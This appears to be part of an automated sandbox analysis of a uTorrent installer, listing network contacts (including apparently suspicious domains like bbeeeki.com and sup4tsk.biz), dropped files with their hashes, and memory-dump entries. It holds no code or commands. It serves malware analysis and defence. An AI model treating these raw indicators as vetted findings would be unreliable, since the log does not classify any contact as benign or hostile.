US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
RU 5.140.3.18:49001 udp
DE 47.246.146.53:443 tcp
CN 124.239.14.252:443 tcp
DE 47.246.146.54:443 us.ynuf.aliapp.org tcp
CN 124.239.14.252:443 tcp
RU 152.89.198.214:53 bbeeeki.com udp
US 185.208.158.202:80 bbeeeki.com tcp
US 8.8.8.8:53 202.158.208.185.in-addr.arpa udp
KR 221.165.161.197:40629 udp
US 172.234.222.143:80 torrentclub.tech tcp
US 172.234.222.138:80 torrentclub.tech tcp
KR 112.184.199.201:40796 udp
FR 5.196.111.64:443 www9.smartadserver.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
US 104.222.16.99:57190 tcp
GB 217.44.73.79:43558 tcp
CN 114.84.254.47:42833 udp
CN 124.239.14.253:443 tcp
CN 124.239.14.253:443 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
GB 90.242.248.253:8025 udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
SG 47.246.110.44:443 ae.mmstat.com tcp
GB 163.181.154.237:443 bottom.campaign.aliexpress.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
DE 47.246.146.13:443 acs.aliexpress.com tcp
US 8.8.8.8:53 us.ynuf.aliapp.org udp
US 8.8.8.8:53 us.ynuf.aliapp.org udp
DE 47.246.146.54:443 us.ynuf.aliapp.org tcp
US 8.8.8.8:53 3sr0fd.tdum.alibaba.com udp
US 8.8.8.8:53 3sr0fd.tdum.alibaba.com udp
US 8.8.8.8:53 ynuf.aliapp.org udp
US 8.8.8.8:53 ynuf.aliapp.org udp
CN 124.239.14.253:443 ynuf.aliapp.org tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
CN 124.239.14.253:443 ynuf.aliapp.org tcp
RU 212.103.119.182:49001 udp
US 8.8.8.8:443 dns.google udp
DE 47.246.146.191:443 3sr0fd.tdum.alibaba.com tcp
IL 212.199.154.18:19463 udp
CA 70.71.199.183:1449 udp
DZ 41.99.87.115:55196 tcp
CN 124.239.14.252:443 ynuf.aliapp.org tcp
CN 124.239.14.252:443 ynuf.aliapp.org tcp
BE 109.138.39.147:58947 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 185.208.158.202:80 bbeeeki.com tcp
NL 89.105.201.183:2023 tcp
US 72.21.17.92:32365 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp

Files

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\bt_datachannel.dll

MD5 dfca05beb0d6a31913c04b1314ca8b4a
SHA1 5fbbccf13325828016446f63d21250c723578841
SHA256 d4c4e05fade7e76f4a2d0c9c58a6b9b82b761d9951ffddd838c381549368e153
SHA512 858d4fb9d073c51c0ab7a0b896c30e35376678cc12aec189085638376d3cc74c1821495692eac378e4509ef5dcab0e8b950ad5bfab66d2c62ab31bc0a75118cf

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\nsisFirewall.dll

MD5 f5bf81a102de52a4add21b8a367e54e0
SHA1 cf1e76ffe4a3ecd4dad453112afd33624f16751c
SHA256 53be5716ad80945cb99681d5dbda60492f5dfb206fbfdb776b769b3eeb18d2c2
SHA512 6e280a75f706474ad31b2ce770fa34f54cb598528fac4477c466200a608b79c0f9b84011545595d9ba94331ad08e2f51bd42de91f92379db27686a28ba351256

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\INetC.dll

MD5 640bff73a5f8e37b202d911e4749b2e9
SHA1 9588dd7561ab7de3bca392b084bec91f3521c879
SHA256 c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502
SHA512 39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe

MD5 b7f8a3909ad963d5b5260dacfa897e6e
SHA1 030ed1e99cb6d681dadca6068caf194bf67580e9
SHA256 8837428a93c7ee46b9772d6c857e109e9baa0f5b28450f87fff7c0e8b87cf017
SHA512 42569e974ef38ddea3300c6d82fd5e371c3cff8bdb04311c6bf3d94727fc37c5ef223ad07198ca2e499528a1671593ea6ef2bf3000611dbda49ca0a0c59c6bb4

memory/3132-35-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\utorrent\settings.dat.old

MD5 56b5537a597d3d8ef245eb221a1fecd8
SHA1 7781619c765c30363369676a8cd959ba27c9643c
SHA256 6ef8a78dcd76e0f91a95d0d3b8d298a9ce0df5a5b7ac1350fd958e2041ce6f8e
SHA512 60fcc8992f62f7b7c90aa60332f45ae4e09e114d25e69f6bbd9a8f2fbde58e87f1b3479366269028d614c181eb5b9ad4f7b0a6dbae6683a99124556a9bc26ac6

C:\Users\Admin\AppData\Roaming\utorrent\toolbar.benc.new

MD5 aeee649704374e873627d801cd519ce0
SHA1 40bd813e8daba94272cfe877d770a1aa2e9cc293
SHA256 b38a11c2f6b49cbec65a537274e3d9466f5a85570568a82614241b41a43987a0
SHA512 ac826097ff2e73c3ab2793a81fb69295d7ee2b3e367de16495e6dddc3edb16676206c5182da586b339f3fa420efb678e2db3c5d864a76b0c359c4b2df0e1480b

memory/3132-61-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-62-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-63-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-64-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\utorrent\settings.dat.old

MD5 69aa54d667e0b89b2eaea2d065e3f0e2
SHA1 2356dbe670d0be5b9b5e5b0f7e9f0df8db3313a0
SHA256 4dc9d880df852695d44e762fb3e8e8d48f9f15f9bdf6bfdd819cae34f6deb682
SHA512 f6c1e11c4c7f397f17a22ac7f7b7bc00f87e12ac718643ac14f4d685ffb889c85d7aa6af338a01872253c27f53c1f35446198b629248a4773aa8d7b856aa82ec

memory/2008-90-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/3132-92-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat

MD5 8bea4c343900bd217f887777e5305b14
SHA1 e370f4db3c5f1467d88a67b5d7c5560d6f5be174
SHA256 a9176b77f7274d6cd59b19ca890db19f8535a0bcb46bbde31b76dc07e8d6f377
SHA512 af586f424a1fd3578c39046342f2db175c42071f29f3d5a3b4e98faf4370618dd6abe0376988620d753d0189ab5e9a28d7ba1d5d5bd4b1db031e045c45cf636d

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3870231897-2573482396-1083937135-1000\1f91d2d17ea675d4c2c3192e241743f9_27b06f29-58d3-4ff3-b1fc-f519e4e4f0ec

MD5 060c222ab58ac8b3d973cab120990b03
SHA1 db16e6c7c7918f38cf994232ff66a82aac27c5f1
SHA256 6d1303ca42f13823da55cf55a272821e97e5677967ba8bf24af178a2adb29ec1
SHA512 bfe07c4f339916c2dc5afd7d648ce5af6acfa429d9685f30b0a107be6ae25d8fbab9d3c895145819cee4a7b2989dc791d8de44790c5a8f93c0dec97bf6c61458

C:\Users\Admin\AppData\Roaming\uTorrent\updates.dat

MD5 2cc08ee7189af097ed1c4b3910158dc4
SHA1 3b592c36c48babb2e2e9c0f94427dc6b1895620a
SHA256 ea5b7e41a52bc08867bb4cbd4cc54f2fb38856372cec8967f1bd6f20cf1959cc
SHA512 1695aa3f6dd93731e0e18e6d7f01bf3c960cd157d4b0af239d0c4e2a2ea626eb91285323c6785b1857c895ec091fd916d2b9b258f41023302da1c7ef7cb6b0a1

C:\Users\Admin\AppData\Roaming\utorrent\updates\3.6.0_47142\utorrentie.exe

MD5 cb7beaf76d79ccc4d91d043419ec3661
SHA1 6952a0600d07c65f023e7a33cc1f9e9e8bd426b3
SHA256 ab5fb8587d7ec8dd8e9ea9e69d8a8695bb165f44fe1d07f0f7df1ace5203d552
SHA512 cbf6e27909f7ae5798154e9a5138bf4fa14f42504593f7918563b81178d4b15dec1649ae43d9fcef062980b05f6024b953d09796419f8ce28f79fc27e6453363

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\settings.dat

MD5 e8d87151a02ac64a0a513b1a4ff344d5
SHA1 515e71d8297e42299676a1bf8d47a626affa6e64
SHA256 396dda168726a16612e0709a029846ca605153f39392ad81cf1bd8636e2c3af5
SHA512 5fb6b4e018baa8be369d705fe0a74baf9492535844865905239593479095446e294e8a7415ce5c4542be7113b99c7fe1aaa0ab39ca6d3adf8ee0f39a5fe57f99

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\settings.dat

MD5 46de5f04e231ddb5df3e575ea9f391cc
SHA1 1ada87fb6ac435fd0a22ed2d84e6a83e53b5de0c
SHA256 401d5113252ca3852bc78deddcdafb0c838314888fd9c030f54b98a043f8e1dd
SHA512 5a5669aac0c9ff77ba7b6fb9666870714ecc7db2983588b26401cd35b45078ba20618ac09868ef2c02956474f2261e454c6af3d325cd0152cc2d078b81712c76

\??\pipe\LOCAL\crashpad_1992_DEXCOIOLTERKAKBE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2108-177-0x00007FFFEAD30000-0x00007FFFEAD31000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 549f7151a780973b1ceb1d7c06a0d63c
SHA1 3ee065e33bee89fbc66317972278735aeb1acdc0
SHA256 03a85329fff9a33db4615e50f769b9f57f58c02038e58d7761852a8edfa2e95b
SHA512 9674e267be3d2468391326635f203412b7d8967b33e508eaf62f6497a178ccb8fb5bdc6cae874f0a575b75b5568bf6a438d2ec92bba3555c076673a66ff96314

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 1bf7986ecf0333a7eb31ea9405cf08e1
SHA1 eb5806a1ebb64944815e4d1ba8d911e81a535bf4
SHA256 8f1bac98797c9cdd5785fa72dab5092c6206c379c0da4170b8a819dc92ec34fe
SHA512 bb32dc03ae0206ae5759e6c782b76b1f59db18f416d3a092002f2afc445b7a1f2b4e97f76ec6b6a291b4fe1e1bed50b447927cfaa23758443d3a6d57b47ad67d

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad\settings.dat

MD5 84e01812d853821ebe4bf60699893e51
SHA1 7de788010156ddc3ee7eedea2db69be142122c37
SHA256 d6c2cd8f2da9e9df981fb649c1b588ca555848c597452e2f4edcc10664079222
SHA512 422e5ffe4ad281a3bb81126dc4fe53a06b0ef605d2e82245b9d30dcb5586083c0dfbcf577f2e0ccbd359299f6bb7829844b226e8aa2b347a3f286fc90d1402d9

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 6a6c95fe93101e4e549811434cc88303
SHA1 6355b8c84dd965fb9900f72225ce12da5c2c71d4
SHA256 a560764eaf6ad95cb04ad4a423aea4c00fb6ee6c11e9eb07c36b2c981844c31a
SHA512 4660d566ed8743d7126ced6f0a2dbf80b6a7c62ef734b9b0fbad32231a91303582bc038cb764890a7a6687b0c808373fcd1e8b534f5260bae7da5fd40df1c181

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d68c7edc2a288ee58e6629398bb9f7c
SHA1 6c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256 dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA512 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4225f9df67bc6d6305d279fca1cc0e95
SHA1 81025b67c14273b1206f94c82c47d544b2f24e7e
SHA256 f796ba2cdc51dc7a09e1b3e993e04b15f8b81b4b9c2758b77a76e839bc8dc1fd
SHA512 7b53d6b02cf9969e03072ff163afc946a22d908b9e95ad6a66bce23626b48e562ba594d15ad58b0dfa00d69d26f962f41df38e5d6509256f3995c55e73acd464

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

MD5 d463c4cceb81509cff7f93e8263cce1d
SHA1 a1b4aef43fcdc39b31f8c3bd2172d43ea12c2923
SHA256 6f2fbd501b9638f80152e84a3f0ca89ab083ed87a8a9da84e121a54b1df4ae60
SHA512 36de60ffe124cb7de1bf3dcf4f6d7fe75cc794ed2d90afb382690c63ecf8dc2206b2582824d0750e14d7e3b26fba7e140564a3b761f37cc7ef72dc50b73afb5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

MD5 28895bd8818b2b2fca7f2a58b1ca4ced
SHA1 335ee5e60317fff1124698e14cb479563b793408
SHA256 d3eb7da955e8d725e474e0ccef85315447bcdb9d36ade9874bd4324756b159e4
SHA512 8d65f4aeb12811868412fac429f8a82ccc94aa7699a4bfbe1d7048a951831abcbfd9fde284d84e8895ec1788f67e0685fba03e925b12a55e6ac0c96b3be12124

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\GrShaderCache\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/2108-393-0x0000022A9F0B0000-0x0000022A9F11F000-memory.dmp

memory/1640-394-0x0000020A1CB10000-0x0000020A1CB7F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 87e8230a9ca3f0c5ccfa56f70276e2f2
SHA1 eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7
SHA256 e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9
SHA512 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

C:\Users\Admin\Desktop\µTorrent.lnk

MD5 0d42f3a2ea653d5431d36a9ce8fe23fb
SHA1 ce6693c1e31aa8c2e9aa81bd719b1f344f8c40a9
SHA256 aa0d7582e064e7fd9b6980c0c860c87230a73814a6ec946d3967735e6d41f31c
SHA512 4a5bd566b8c8709d00e09ad0e9db0a9c248332f4f4b4afa63958838e19dcd3a0906e2f7817066287e4aeb6bd784eb2b48ff5243450c85b1220d164c136861889

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

memory/2980-558-0x00007FFFEAC60000-0x00007FFFEAC61000-memory.dmp

memory/2980-559-0x00007FFFEA460000-0x00007FFFEA461000-memory.dmp

memory/2008-562-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/2008-561-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 8d524b468971edea1e51763d2b1a579f
SHA1 2b53d73d5c590befaa1b1c7458c11db6e4ce0a45
SHA256 598fcdfbcad78d5885548043b4a690babd6b52b281d94e4c99a9386ba8fc7c19
SHA512 e9da3f970b47bd8596dc65c3f8cfa3f80efefa5a1de3963427946b029431b3ba557ec4c3a34ba81b6489a1031fda31803282e878f43647f1753ee5211e5aee64

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 bd5434f1fb063882f008bd779113a616
SHA1 f57c4d0d16ace2ceeede564ce037ddf7f7d40199
SHA256 9ab1a4b363a64f95fbc68266789cbac3d5c1e212ce4ab69891a2118b2e3e8509
SHA512 d2267a27b7eb541c3423f05026774bb465f0423eb885ca361a19853fe07027b722b53de545e43573127f237593c02fdad9c3cafb60d82b53a84661c0fe552540

memory/5060-689-0x0000026D6EF80000-0x0000026D6EFEF000-memory.dmp

memory/764-690-0x000001ECE2BA0000-0x000001ECE2C0F000-memory.dmp

memory/5184-699-0x000002136B4E0000-0x000002136B54F000-memory.dmp

memory/5216-766-0x000001F439E60000-0x000001F439ECF000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000010

MD5 d4141c2722d08cfa132fe537ece49f64
SHA1 8a97c1f278e1581c8f638235c32ca6ca00d6e318
SHA256 980e5e4c8e485cbb861559c9fe15c3b19a1832f29232cbdfdbabfd0bf6b351b8
SHA512 fb8ba7dd9ca9dfc62c7c377c64bc5bd4c64d7c9efcfd2c7276ffc3568fa70b7a9dc534bfccc1b46fa9a89e458066854f60903aa689bb840ec2c32bad418dc4a1

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000013

MD5 17afdfcf738143362ce56f2f5e764296
SHA1 31b5352513d6749c476670c39bd4d02aede9e825
SHA256 b954fdd162dad834304e37e54a2aa23893a67ad6768f68849815ba4ec1dddcc0
SHA512 60f73f10ba89178cbeccdd142b06da7b8fa5c76c287e7e008668174512fa2385feecca1fc9b37c1ef123f1fcc969b226fda98f45e91428fbfaddd2f3de7d9bc9

memory/5208-791-0x000001C71EAE0000-0x000001C71EB4F000-memory.dmp

memory/5320-792-0x000001555B090000-0x000001555B0FF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 49b3267f8fa5eb4b16de73bfcbc9a8e0
SHA1 2411d475753bc42816a081c1bd68ed685f5f98cf
SHA256 799720138dae2bb1404cccbe5ae98936d38899d908a5cf14bd5d124dadc21908
SHA512 553b522e63287af0146c78824bbb569ca4cc0bcc9f92bc9a52c5705707efcf202e14e171b284d4135447fb10f30cd4ffdda1e3c1cf35f036424295202e4ecb02

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000001

MD5 c3810004c7ec2d5f40a1da201aec6fe9
SHA1 3c33ada8b7e25b61e56dbc61a7872bc53c485210
SHA256 bafd5ad035f0eefe6369e57d9abc71e47cbb270d7a70fd0260f1486f0a38e708
SHA512 48cbffffeeadbe255db88d01ab8c15f2601b3ffc91016242bc8f7c54b31495124fe53a98a3e688a9195268f4455a1e840eb0fe2cebcf5087d046b23cbefa5e5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8d71c67f323edb2df137ee4497d9c9ee
SHA1 f2f82ecb5f314fefdbebf8f90dfe662cd8a33cbc
SHA256 ae0aed718b2295fc18f3af345eef5d6f89263ac84a947b63f0508c83ef582911
SHA512 a1f7c70ff9d48ec308f10dbdaf3b068cca737f3045f0ff642ebe4b4875c65b1c0205761f4d08d155707074c0a4953f6498aef599536d60f207587be81baa13d6

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_00000d

MD5 abbc94e6db3225213bbd5c8e16d86c15
SHA1 03cacebacaf5800eef1c0c4e2fe385e854c9a577
SHA256 a05eb596c6f88207364bb712803feaa283d5d0acb87c1d5cf2ca15e433419df9
SHA512 fe04b6720031e712777af218881e36da0a4397076289756257f8c65cc6be934beebf1546f37a930b72310398ad7a4f331f2b3003cbe700889f7aa1e9c455267a

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_00000b

MD5 f1d9d186e57910d58688dd0b009319fc
SHA1 f82484219c6e1bebe8ce0b5fdadff503248189c4
SHA256 d7afd3801127cf53117241b74b8f19d58f8a337d1f77cd06ce44a029deceb0f4
SHA512 73d8cdc2c3e6fc89d32e04b5db7c394ca2d1a8be3eed5f3634d63b8aaf9b990eac8be769f3eed37d7ce67b733f1298906998108963213ded9a6ddc52195a120a

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 e1e50035af4bd5d1452e83db4ef1c2e9
SHA1 5d3b6e7ff280e2a5bccca220a5a986f9d374f892
SHA256 e1c8044f6348f70a45bc675edb12ef861d7de0e3e34e02e42f3ccc1eccc353d1
SHA512 4a7a29883fb884ef42d3b7c15db15bf6ef10bdb34942e487b738db170aa77a877f50e1450c35c5989a97906313843d5273318490e4d0d1b405b8c4972fe969a9

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Cache\f_000012

MD5 766304e17715e000e612ac472ec7fb54
SHA1 0e8448d4b51cbb7e4efec3158c1d29380c8499ab
SHA256 51aed6ec5d7b61e43be474701b1e485e8a1f12ce7aa99adb652dadfcccd81073
SHA512 55f127668dadc02b3f0919a5bd239df12e1abdda3c38bc881fbda9207f2a63e2465d5d10299cb51cc63eec364a93d307059869663864397d6d510b4f227c3792

memory/2980-945-0x000001FFBEB40000-0x000001FFBEBAF000-memory.dmp

memory/2008-949-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 e406385cff592c99f81ef5beac459ce1
SHA1 b1d5055262e0e328d69a84163b986a155d09d26a
SHA256 84d0ed7539618babbbb4a1176a95c6a44e92ce14f9a9ac91d0a18055a659f0fe
SHA512 e13f56de17d010a0db3abbbe85dd18b731f998b7b0e196fe003208c0b84d85766a90b5956bb1aea2ade217709f934596494860d6a8ce6f25c40918143133e892

memory/2504-957-0x000002A8C2860000-0x000002A8C28CF000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Preferences~RFe586339.TMP

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity~RFe586b67.TMP

C:\Users\Admin\AppData\Roaming\utorrent\helper_web_ui.btinstall

